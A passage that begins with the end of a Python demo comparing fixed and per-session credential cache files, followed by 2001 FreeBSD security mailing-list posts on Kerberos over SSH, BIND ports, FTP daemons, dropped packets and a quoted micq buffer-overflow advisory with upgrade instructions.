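    os.unlink(path)


def demo(uid=1000):
    """Two concurrent logins of the same uid under each scheme.

    Returns the observations as a dict so a caller can check them.
    """
    tmpdir = tempfile.mkdtemp(prefix="tktdemo.")
    try:
        # Fixed name: both sessions end up on the same file ...
        p1, fd1 = login_fixed_name(tmpdir, uid)
        p2, fd2 = login_fixed_name(tmpdir, uid)
        logout(p1, fd1)                              # first session logs out
        fixed_second_hosed = not os.path.exists(p2)  # second has no cache left
        os.close(fd2)

        # Per-session name: two files; the first logout leaves the second alone.
        s1, sfd1 = login_session_name(tmpdir, uid)
        s2, sfd2 = login_session_name(tmpdir, uid)
        logout(s1, sfd1)
        session_second_intact = os.path.exists(s2)
        logout(s2, sfd2)

        return {
            "fixed_same_path": p1 == p2,
            "fixed_second_hosed": fixed_second_hosed,
            "session_paths_differ": s1 != s2,
            "session_second_intact": session_second_intact,
        }
    finally:
        for name in os.listdir(tmpdir):
            os.unlink(os.path.join(tmpdir, name))
        os.rmdir(tmpdir)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```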
From owner-freebsd-security Fri Feb 2 21:13:51 2001
Date: Sat, 3 Feb 2001 00:13:30 -0500 (EST)
From: Garrett Wollman
Message-Id: <200102030513.AAA94021@khavrinen.lcs.mit.edu>
To: Robert Watson
Cc: security@FreeBSD.ORG
Subject: Re: PAM/SSH and KerberosIV?
References: <200101310049.f0V0n1f15852@green.dyndns.org>

< said:
> I ran through the tests, and the following occurs: without the
> pam_kerberosIV.so entry in /etc/pam.conf, you cannot log in using
> kerberos.

My feeling is that enabling pam_kerberosIV for anything other than login and xdm is an exceedingly poor idea. It's bad enough that most SSH clients confuse the issue by prompting for the password as if it were being processed locally. At least if you make users kinit manually, there's a fair understanding of what is actually happening where. The entire point and design of Kerberos is that you never, ever send your password over the net, not even over an encrypted channel except to change it.

My own personal policy, which many would call overly strict, is to set `PasswordAuthentication no' on any sshd which knows how to do Kerberos. (I can't always implement my own policy even on machines completely under my control.)

-GAWollman

From owner-freebsd-security Fri Feb 2 21:25:06 2001
Date: Fri, 2 Feb 2001 21:24:46 -0800 (PST)
From: Roger Marquis
To: security@FreeBSD.ORG
Subject: Re: bind8.2.3 and installation problem

Wes Peters wrote:
> > Bind was written on BSD. What's the point of using a port to
> > upgrade it? All FreeBSD's bind port does is increase your chances
> > of errors, reduce your system's overall QA, and install duplicate
> > files in non-standard places.
>
> You completely and utterly fail to understand how the ports system works.
> What FreeBSD's bind port really does is decrease your chance of errors,
> increase your system's overall QA, install all of the bind configuration
> and executable files in standard FreeBSD locations, track which files
> were installed and allow you to deinstall them simply, and provide a
> one-stop upgrade path.

Wes, I believe you "utterly fail to understand" the level of quality assurance in FreeBSD's ports collection. Certainly ports are vastly better than Linux rpms but they have more than enough bugs to render such blind faith ill-advised.

Install bind first via ports and then via the bind-supplied Makefile. You may find, as I did, that the port _increases_ your chances of errors and _does_not_ install files in their original locations. The only feature this particular port adds, when it works, is a log under /var/db/pkg that's easier to parse than `make -n`.

I've been a big fan of ports since 2.0.5. They are, IMHO, FreeBSD's best feature. However, that does not mean they should be trusted like a Windows setup.exe.

-- 
Roger Marquis
Roble Systems Consulting
http://www.roble.com/

From owner-freebsd-security Sat Feb 3 7:32:58 2001
Date: Sun, 4 Feb 2001 02:32:29 +1100 (EST)
From: Darren Reed
Message-Id: <200102031532.CAA20696@caligula.anu.edu.au>
To: mime@traveller.cz (Michal Mertl)
Cc: security@FreeBSD.ORG
Subject: Re: strange dropped packets
In-Reply-To: from Michal Mertl at "Feb 2, 1 11:55:22 am"
X-Mailer: ELM [version 2.4ME+ PL39 (25)]

In some mail from Michal Mertl, sie said:
> I've installed and configured several FreeBSD boxes (>=4.1). On all of
> them I use log_in_vain="YES" in rc.conf. Sometimes I also install ipfilter
> (with rules with minimal holes in and outbound traffic with "keep state").
> Either with ipfilter installed or not I see dropped packets in
> /var/log/messages (result of log_in_vain) which seems to me like last
> packets of a regular communications open from inside (either UDP (dns
> queries) or TCP (mostly web)).

On the internet today, I wouldn't be surprised if some packets can transit the network and take enough time that the state a connection is in causes it to expire before the "next" packet arrives.

From owner-freebsd-security Sat Feb 3 10:30:00 2001
Date: Sat, 3 Feb 2001 13:29:39 -0500 (EST)
From: Igor Roshchin
Message-Id: <200102031829.NAA71216@giganda.komkon.org>
To: security-officer@freebsd.org, security@freebsd.org
Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:14.micq

Hello!

micq packages (at least for 3-stable and 4-stable) are not available yet. Is it that they just haven't been generated yet, or somebody forgot about them?

Just reminding...

Thanks.

Igor

> From owner-freebsd-security-notifications@FreeBSD.ORG Tue Jan 30 04:26:25 2001
> Date: Tue, 30 Jan 2001 01:25:01 -0800 (PST)
> From: FreeBSD Security Advisories
> To: FreeBSD Security Advisories
> Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-01:14.micq
>
> =============================================================================
> FreeBSD-SA-01:14                                            Security Advisory
>                                                                 FreeBSD, Inc.
>
> Topic:          micq remote buffer overflow vulnerability
>
> Category:       ports
> Module:         micq
> Announced:      2001-01-29
> Credits:        recidjvo@pkcrew.org
> Affects:        Ports collection prior to the correction date.
> Corrected:      2001-01-24
> Vendor status:  Updated version released
> FreeBSD only:   NO
>
> I.   Background
>
> micq is a text-based ICQ client.
> II.  Problem Description
>
> The micq port, versions prior to 0.4.6.1, contains a remote
> vulnerability: due to a buffer overflow, a malicious remote user
> sending specially-crafted packets may be able to execute arbitrary
> code on the local system with the privileges of the micq process. To
> accomplish this, the attacker must be able to sniff the packets
> between the micq client and ICQ server in order to gain the session
> key to cause the client to accept the malicious packets.
>
> The micq port is not installed by default, nor is it "part of FreeBSD"
> as such: it is part of the FreeBSD ports collection, which contains
> over 4500 third-party applications in a ready-to-install format. The
> ports collections shipped with FreeBSD 3.5.1 and 4.2 contain this
> problem since it was discovered after the releases.
>
> FreeBSD makes no claim about the security of these third-party
> applications, although an effort is underway to provide a security
> audit of the most security-critical ports.
>
> III. Impact
>
> Malicious remote users may cause arbitrary code to be executed
> with the privileges of the micq process.
>
> If you have not chosen to install the micq port/package, then
> your system is not vulnerable to this problem.
>
> IV.  Workaround
>
> Deinstall the micq port/package, if you have installed it.
>
> V.   Solution
>
> One of the following:
>
> 1) Upgrade your entire ports collection and rebuild the micq port.
>
> 2) Deinstall the old package and install a new package dated after the
> correction date, obtained from:
>
> [i386]
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/net/micq-0.4.6.1.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/net/micq-0.4.6.1.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/net/micq-0.4.6.1.tgz
>
> [alpha]
> Packages are not automatically generated for the alpha architecture at
> this time due to lack of build resources.
>
> 3) download a new port skeleton for the micq port from:
>
> http://www.freebsd.org/ports/
>
> and use it to rebuild the port.
>
> 4) Use the portcheckout utility to automate option (3) above. The
> portcheckout port is available in /usr/ports/devel/portcheckout or the
> package can be obtained from:
>
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

From owner-freebsd-security Sat Feb 3 11:53:15 2001
Date: Sat, 3 Feb 2001 21:53:08 +0100
From: Clemens Hermann
To: freebsd-security@FreeBSD.org
Subject: Re: ftp
Message-ID: <20010203215308.G1412@ramses.local>
User-Agent: Mutt/1.2.5i
In-Reply-To: von Matt Heckaman am 02.Feb.2001 um 15:16:13 (-0500)
X-Mailer: Mutt 1.2.5i (Linux 2.2.17 i586)

On 02.02.2001 at 15:16:13, Matt Heckaman wrote:

Hi Matt,

> : Another way is to use wu-ftpd, and "man ftpaccess"
>
> Otherwise known as root-exploits-R-us :)

I have been looking for a rather secure ftp-daemon. At the moment I am using proftpd because I really need the virtual-user feature. With this I can avoid the transmission of system passwords via ftp. Any user is a pseudo-uid in the proftpd users file. This is - in my opinion - a really good thing for ftp because so you can keep your system users/passwords secret. Anyway, I would appreciate it a lot if I could switch to the normal FreeBSD ftpd. Is there one way to get something like the virtual proftpd users to run with ftpd?

thanks in advance

/ch

From owner-freebsd-security Sat Feb 3 12:17:27 2001
Date: Sat, 3 Feb 2001 12:16:43 -0800
From: Kris Kennaway
To: Igor Roshchin
Cc: security-officer@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:14.micq
Message-ID: <20010203121643.C40178@xor.obsecurity.org>
References: <200102031829.NAA71216@giganda.komkon.org>
User-Agent: Mutt/1.2.5i
In-Reply-To: <200102031829.NAA71216@giganda.komkon.org>; from str@giganda.komkon.org on Sat, Feb 03, 2001 at 01:29:39PM -0500

On Sat, Feb 03, 2001 at 01:29:39PM -0500, Igor Roshchin wrote:
>
> Hello!
>
> micq packages (at least for 3-stable and 4-stable) are not
> available yet.
>
> Is it that they just haven't been generated yet, or
> somebody forgot about them ?

They're generated automatically by bento.freebsd.org. I don't know what's going on, they should be getting built (bento doesn't complain about any build errors).
Kris

From owner-freebsd-security Sat Feb 3 19:18:55 2001
Date: Sat, 3 Feb 2001 21:23:21 +0100
From: Gerhard Sittig
To: freebsd-security@FreeBSD.org
Subject: Re: ftp
Message-ID: <20010203212321.P253@speedy.gsinet>
References: <20010203215308.G1412@ramses.local>
X-Mailer: Mutt 1.0i
In-Reply-To: <20010203215308.G1412@ramses.local>; from haribeau@gmx.de on Sat, Feb 03, 2001 at 09:53:08PM +0100
Organization: System Defenestrators Inc.

On Sat, Feb 03, 2001 at 21:53 +0100, Clemens Hermann wrote:
>
> At the moment I am using proftpd because I really need the
> virtual-user feature. With this I can avoid the transmission of
> system-passwords via ftp. Any user is a pseudo-uid in the
> proftpd users file. This is - in my opinion - a really good
> thing for ftp because so you can keep your system
> users/passwords secret. Anyway I would appreciate it a lot if
> I could switch to the normal FreeBSD ftpd. Is there one way to
> get something like the virtual proftpd users to run with ftpd?

$ grep ftp /etc/inetd.conf
$ ldd /usr/libexec/ftpd

It supports PAM. This should allow you to authenticate users against any form of textfile, database or network daemon. It's just that you had to examine this yourself since I never tried and thus cannot tell for sure how well it works (don't use ftp at all around here) ... :)

virtually yours
82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig      true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
-- 
If you don't understand or are scared by any of the above ask your parents or an adult to help you.

From owner-freebsd-security Sat Feb 3 22:13:54 2001
Date: Sat, 03 Feb 2001 22:13:35 -0800
From: Doug Barton
Organization: Triborough Bridge & Tunnel Authority
X-Mailer: Mozilla 4.76 [en] (Win98; U)
Message-ID: <3A7CF30F.249FD032@gorean.org>
To: Ade Lovett
Cc: Rasputin, freebsd-security@FreeBSD.org, imp@village.org
Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch)
References: <20010124230626.A49802@citusc17.usc.edu> <20010125103255.A78404@FreeBSD.org> <200101262153.f0QLrLL40016@earth.backplane.com> <20010129095752.A37233@dogma.freebsd-uk.eu.org> <20010129101411.A16899@FreeBSD.org>

Ade Lovett wrote:
>
> On Mon, Jan 29, 2001 at 09:57:53AM +0000, Rasputin wrote:
> > In general I'd agree with Matt and aDe, but if a directive
> > affecting security has changed, I'd say it's better to be notified of it
> > as soon as possible.
> > Killing off sshd obviously makes remote admin a real problem, though;
> > is there another way to guarantee we'd notice ?
>
> Well, something in /usr/src/UPDATING might have helped.
> Believe it or not, I do read it. Nothing there.
>
> Update -stable box, run mergemaster, ignore anything to do with
> ssh_config or sshd_config since ours are fairly heavily different,
> reboot, no sshd.

This, BTW, is one of the reasons I'm so fascist about mm displaying diffs when files are actually different. Every once in a while, things like this happen. Whether they _should_ happen or not is a whole different question.

Doug